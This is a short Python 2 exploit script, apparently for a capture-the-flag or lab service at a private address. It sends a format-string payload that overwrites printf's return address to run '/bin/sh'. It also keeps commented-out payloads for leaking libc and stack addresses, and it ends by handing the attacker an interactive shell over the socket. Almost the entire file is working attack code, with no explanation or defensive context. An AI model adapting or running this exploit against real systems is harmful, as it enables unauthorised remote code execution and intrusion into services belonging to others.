import os
import random
import sys
import struct
import socket
import telnetlib
import time

host = "10.13.37.24"
port = 4001

def read_until(s, text):
  buffer = ""
  while len(buffer) < len(text):
    buffer += s.recv(1)
  while buffer != text:
    buffer = buffer[1:] + s.recv(1)

##########################################################################
# Exploit start
##########################################################################

# Connect to remote host
s = socket.socket()
s.connect((host, port))

raw_input("Go? ")

# XXX: read libc base below
#s.send("A" * 1024)
#s.send("--libc-marker-%19$.8x".ljust(0x100, "\xcc"))
#s.send("838\0".ljust(0x10, "\0"))
#read_until(s, "--libc-marker-")
#libc_base = int(s.recv(8), 16) - 0x33a55
#libc_base = 0xf7e25000 # local
libc_base = 0xb7e20000 # server
print "[+] libc base: %x" % libc_base

# XXX: read stack pointer below
#s.send("A" * 1024)
#s.send("--stack-marker-%14$x".ljust(0x100, "\xcc"))
#s.send("888\0".ljust(0x10, "\0"))
#read_until(s, "--stack-marker-")
#stack_base = int(s.recv(8), 16) - 0x68
#stack_base = 0xffffd130 # local
stack_base = 0xbffffcf0 # server
print "[+] stack pointer: %x" % stack_base

# XXX: arbitrary write below.
printf_retaddr_offset = 0x24
s.send(";/bin/sh;".ljust(1024, "A"))
s.send("%.3671x%8$n%.42374x%9$n".ljust(0x100, "\xcc"))
s.send(("981\0" + struct.pack('I', stack_base - printf_retaddr_offset) + struct.pack('I', stack_base - printf_retaddr_offset + 2)).ljust(0x10, "\0"))

# Give control to user
t = telnetlib.Telnet()
t.sock = s
t.interact()

